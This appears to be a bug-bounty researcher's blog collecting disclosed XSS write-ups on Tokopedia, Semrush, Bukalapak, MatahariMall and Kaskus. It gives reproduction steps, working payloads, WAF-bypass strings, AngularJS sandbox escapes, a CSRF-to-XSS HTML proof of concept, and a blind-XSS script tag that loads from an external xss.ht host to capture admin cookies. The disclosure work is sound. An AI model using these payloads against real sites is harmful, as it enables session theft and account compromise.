Multiple Stored XSS On Tokopedia

So, It’s just old bug who I have been reported around 2018. I’ll share what I found on Tokopedia. Just in case you need some article to go to sleep. But it’ll just short description and PoC Here it is :

Stored XSS On Complain Product (Keterangan Bukti Field)

This vulnerable perform on feature complain product, When buyer not satisfied with the stuff who has been buy by buyer. Buyer can complain with upload some Image. And the vulnerability is on Description image field.

PoC :

  1. Go to complain menu
  2. Upload some image
  3. Input Payload on description of image ( <img src=x onerror=alert(document.domain)> )
  4. Payload will be execute when user navigate to the resolution menu.

Video :

Stored XSS On Location Shop (m.tokopedia.com )

This vulnerable on Location Shop Parameter at https://m.tokopedia.com/ . So, this bug is just set the location shop to payload. And when someone navigate to the Shop detail. It’ll pop up the XSS.

PoC :

  1. Open The mobile apps Tokopedia
  2. Edit the location of shop to XSS payload ( <img src=x onerror=alert(document.domain)> )
  3. Open the location via browser

Video :

Stored XSS via AngularJS Injection On Etalase Name

Vulnerability exist because Tokopedia install the AngularJs old version and not filtering the illegal character very well. So, I just Insert the payload of AngularJs Injection to Etalasane Name and XSS will be fired up.

PoC :

  1. Go To Add product
  2. Set the Etalase Name to AngularJs Payload ( {{‘a’.constructor.prototype.charAt=[].join;$eval(‘x=1} } };alert(document.domain)//’);}} )
  3. Save, And Open the product

Video :

Blind XSS on CS System ( Tokocash )

Tokopedia have some CS system, use the salesforce application. And when having some discussion between Tokopedia & Salesforce, the root cause is on the Tokopedia Custom Code.

PoC :

  1. Login Tokocash.com
  2. REquest new ticket with payload of XSS Hunter
  3. Wait for execute payload on XSSHunter Dashboard.

Actually I have found more Stored XSS, but sadly that’s mark as Duplicate. I just fresh Bug who has been marked as valid only.

Thanks! Get in touch with me on Twitter : Apapedulimu

Exploiting XSS in POST requests on semrush.com

Recently, I’ve found something new for me , and I found this on www.semrush.com some bug bounty program on hackerone  . And it’s first time I’ve found XSS on hackerone program. So, This is the story.

While I’am looking around on semrush.com , try to one page and another page, put some payload on all field, and end on page https://www.semrush.com/my-posts/  this page is can be post something, and you able write everything you want. I try to put some xss payload on the field , but nothing happen.

Then, I try to upload some image, And the interesting time begin. I try to upload malicious filename on that page. It’s looks like this.

I take a long time to analyzing the request and response when I upload some image, but after a cup of coffee, help me to focus, and I notice the parameter CKEditorFuncNum on request is reflected on response. I try to write some text and see the result, is reflect on response

After know is reflected , I use payload XSS to trigger the XSS with payload like this : </script><script>alert(document.domain)</script> and it’s execute as script!.

After know this, I made simple HTML to execute this, and the code is like this :

<html>
  <body>
    <form action="https://www.semrush.com/my-posts/api/image/upload/?CKEditor=text&CKEditorFuncNum=dadasd</script><script>alert(document.domain)</script>&langCode=en" method="POST">
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

And whenever user click Submit Request, The XSS will be fired UP!

This is mark as valid from semrush security team. It’s has been fixed very well. More Experience I Get.

You can visit on hackerone report : https://hackerone.com/reports/375352

How I Accidentally Found Stored XSS On Tokopedia

So, recently I’ve found Stored XSS On Tokopedia. But, I Accidentally Found Them while buy something on tokopedia. And there is it. :

Summary

After found Stored XSS in previous post, and rewarded by Tokopedia, I start looking some Smartphone on tokopedia. And while checkout as usual, then I Have an idea to fill all field with Payload XSS , And then I use XSS Hunter to fill all the field with payload XSS from XSS Hunter. After check out and pay the fee, I start looking XSS Hunter, But no response there. So, I start looking my transaction and see the Invoice. And I got this :

I found my payload in invoice without filtering.

And I look at the invoice and found colomn Catatan Untuk Penjual & Dropshipper  with value of my XSS Payload from xss hunter, But one of them is filtering my Payload. At this Time I Assume If my payload XSS is work on Catatan Untuk Penjual Field, and I must to do is When seller verify my order and send my package. But I Wrong. 

After few days, I notice  if my order has been shipped by seller, and I got the tracking code. After receive notice like this, I start looking my XSS Hunter dashboard. I suprised, because I got response from tokopedia on seller side, So I Assume if my XSS execute on seller side and on Catatan Untuk Penjual parameter.

Got response from seller side on dashboard XSS hunter.

After that, I quickly make report and send it to Tokopedia. With detail if XSS vuln on Catatan Untuk Penjual parameter. In the next day, Tokopedia told me if the report hard to understand , and Ask me to do general alert like previous report. And I starting to try to reproduce it with my own shop, So I can pop up the alert without annoying another person. But, I got confused because no pop up found when I try to reproduce with my recent experience. After re-thinking again, What the problem, my smartphone has arrived, the courier send me the package, and I started to looking the detail from my package And I got suprised because my XSS is pop up on there.

My Payload is execute on there.

Actually, the vuln XSS is not on Catatan Penjual, but on Dropshipper parameter. Iam to dumb because not see the DOM on XSS Hunter, The DOM can help you to see where your XSS is popup their self. After that I started to report again to Tokopedia IT Security Team.

Step To Reproduce :

  1. Buy something
  2. While checkout fill the Dropshipper field with XSS Payload.
  3. Wait the seller to confirm.
  4. XSS will be fired up.
XSS Fired up when seller confirm the order.

Timeline : 

  • Mar 7 : First Report Send
  • Mar 7 : Tokopedia Tim Asked More Information
  • Mar 7 : Detail Report Send
  • Mar 9 : Tokopedia Confirmed the vuln and mark bug as “Medium” Severity
  • Mar 27 : Tokopedia Fix the bug and ask Re-Testing.
  • Mar 27 : I Confirm If bug is fixed from my side.
  • May 2 : Rewarded

Thanks for reading, Happy Hacking!

 

Blind XSS in Admin Panel on Name Parameter

Description :

Blind XSS is fired up on admin panel on name parameter, While the register there’s a field Full Name, I fill it with XSS Payload, I use XSSHunter to execute this. In a Next day I’ve found my XSS result on XSShunter dashboard through their admin Panel, I able to showing admin IP / Cookies / Path of admin, and etc. Maybe the admin will activate / reviewing the user registration.

PoC :

1. Register new account and fill the Field Full name with Payload From XSSHunter. ( “><script src=https://apapedulim.xss.ht></script> )
2. Complete the registration.
3. Wait on the Next Day.

Impact :

Getting the IP / Cookies / Path Of admin of the XSS and able to get the list of other customer details like Name, IDs.

How Do you Know it’s Blind XSS on admin page?

Actually, Im not sure at the first time I found, After registering my account, I get the email from website to confirm my account, And my name going to ">  in my recent test, I use that payload just showing "> and XSS payload will execute,

Verify my email address from website.

I assume It’ll be Stored XSS and will be fired up on admin panel, So, I wait it, And got the response from admin panel.

Note : The team request limited disclosure.

I contacted the team via their contact page. And got positive report from them, After seeing my report they fix the vuln and will send me some SWAG. Yay!

Thanks.

Chaining CSRF With Self-Stored XSS On Tokopedia

Summary :

At the first time, I found Self-Stored XSS on Tokopedia in their template message, In Tokopedia have feature template message to chat seller with common question like “This Goods Is Ready, What Is The Variant color, and etc”. User can set the template message by their self, and I try to insert the payload XSS on the template message , and when I open the message, the XSS will be pop up, And I assume this is Self-Stored XSS. And after that I think if Self-Stored XSS not high enough because the user must be input the payload to their template. And I try to dig the Request And I found some JSON request without Token on their endpoint, and the content-type not checked by their system and I think it will be Valid CSRF. So, I try to chain that bug in one action.

Step to reproduce :

  • Create .html code like this :
<title>CSRF To XSS on tokopedia</title>
<script>
function getMe(){
// retrieve page content
var xhr = new XMLHttpRequest();
// now execute the CSRF attack
xhr.open("POST",
"https://chat.tokopedia.com/tc/v1/update_chat_templates", true);
xhr.withCredentials="true";

xhr.setRequestHeader("Content-type", "application/x-www-form-
urlencoded");

xhr.send('{"is_enable":true,"templates":["Bisa dikirim hari ini
ga?","Terima kasih!","<script>alert(document.domain);//"]}');
}
</script><center>
<h1>CSRF To XSS On tokopedia</h1>
<button onclick="getMe();">Xploit Kuyy</button>
</center>

The code will be send request to https://chat.tokopedia.com/tc/v1/update_chat_templates endpoint to add template message [“Bisa dikirim hari ini ga?”,”Terima kasih!”,”<script>alert(document.domain);//”] . Who included by Payload XSS.

So, when victim visit that link,  will be added payload XSS to their template message, and when victim try to chat with some seller, the XSS will be execute.

Video :

Timeline :

  • Sun, Feb 25, 2018 at 2:31 PM : Report Send
  • Sun, Feb 25, 2018 at 3:34 PM : Tokopedia Team answer will investigate
  • Mon, Feb 26, 2018 at 10:11 AM : Tokopedia Team Mark as Duplicate the XSS ( Found By Internal Team ) and CSRF mark as LOW Severity
  • Tue, Feb 27, 2018 at 9:09 AM : Try to explain the CSRF to get Medium Severity >.<
  • Tue, Feb 27, 2018 at 10:52 AM : Tokopedia Team Mark XSS & CSRF Valid with Medium Severity because the endpoint is different with internal team report
  • Thu, Mar 1, 2018 at 9:57 PM : Tokopedia Fixed The XSS , and tell CSRF not be fixed because the endpoint will changed soon.
  • Wed, Mar 21, 2018 : Rewarded! Yay!

Thanks.

Original Report [ID] : https://drive.google.com/file/d/0B3hUlq3mDkikVXRWdEdBalpmZVlncFFqU3JXSFpFTkFnSGkw/view

Reflected XSS On Search Product via AngularJS Template Injection [ Bukalapak.com ]

Description :

I’ve found Reflected XSS on www.bukalapak.com via AngularJs , I found this by write {{31338-1}} on their search page and found result 31337 . And i also read h1 report from ysx  for my reference to exploit this.

And I use payload from ysx to exploit AngularJS with {{constructor.constructor(‘alert(document.domain)’)()}} payload.

POC (Piye Om Carane ):

  1. login to account
  2. insert the payload to search field
  3. and XSS will fire up

POC URL :

https://www.bukalapak.com/products?utf8=%E2%9C%93&source=navbar&from=omnisearch&search_source=omnisearch_organic&search%5Bkeywords%5D=%7B%7Bconstructor.constructor(%27alert(document.domain)%27)()%7D%7D

Screenshoot :

It fixed 1 day after I report to them.

Reference :

  1. https://hackerone.com/reports/230234
  2. http://blog.portswigger.net/2016/01/xss-without-html-client-side-template.html

Note: I got permission to disclose this report from bukalapak

For Indonesia Languange, you can see my original report on : https://drive.google.com/open?id=0B3hUlq3mDkikRndrLU9TcXo3Y04xVXI1MVJocE8yNXdNWlF3

Thanks!

Bypass Stored XSS on User Edit [ MatahariMall.com ]

Description

I’ve found Stored XSS on user edit in name field, actually MatahariMall.com have WAF to protect it, but i found some payload to bypass it.

Detail : 

Location Of Bug : 

https://www.mataharimall.com/user/edit

Payload : 

"'--!><Script /K/>confirm(1)</Script /K/>#

Step To Reproduce :

  1. Login to your MatahariMall account
  2. Go to User Edit
  3. Add your name with Payload
  4. Save it

It will showing up the XSS and when you access another page, it also will showing up, because the name of your account will be displayed at another page.

Browser :

  1. Chrome And Firefox

Note :

Team of MatahariMall.com fix the bug after 1 day I send report, Wow!

 

Video :

Bypassing XSS

So, after them patching my previous report i going to bypass it, and i bypass it with new payload.

Payload : –!”><svg/onload=confirm(“1”)>

And it pop up the XSS,

it’s a many way to bypass the firewall.

Thanks,

XSS On Kaskus

This is old bug i found on 2016, i write this on my new blog to sharing what i found, because i think its bug is very interesting and unique.

Description

This bug is unique, because XSS exposed when redirect to previous page after login.

Step To Reproduce

  • Go to http://www.kaskus.co.id/thread/57a47e691cbfaa092b8b456a/?ref=header&med=header
  • Change parameter to “><img+src%3Dx+onerror%3Dprompt(‘XSS/By/LocalHost’)%3B>
  • Login with widget on top  and you will redirect
  • And XSS will be exposed

Http Header response : 

username=sebutsajanos&password=&md5password=&md5pass
word_utf=&securitytoken=1470955602-
c2079dd69c8f65d455e977727407176b&url=%252Fthread%252F57a47e691cbfaa092b8b456a%252F%25
3Fref%253Dheader%2526med%253D%252522%25253E%25253Cimg%252Bsrc%25253Dx%252Bonerror
%25253Dprompt%2528%252527XSS%252FBy%252FLocalHost%252527%2529%25253B%25253E

Video : 

Note :

Kaskus Response is very quick and i got SWAG from them.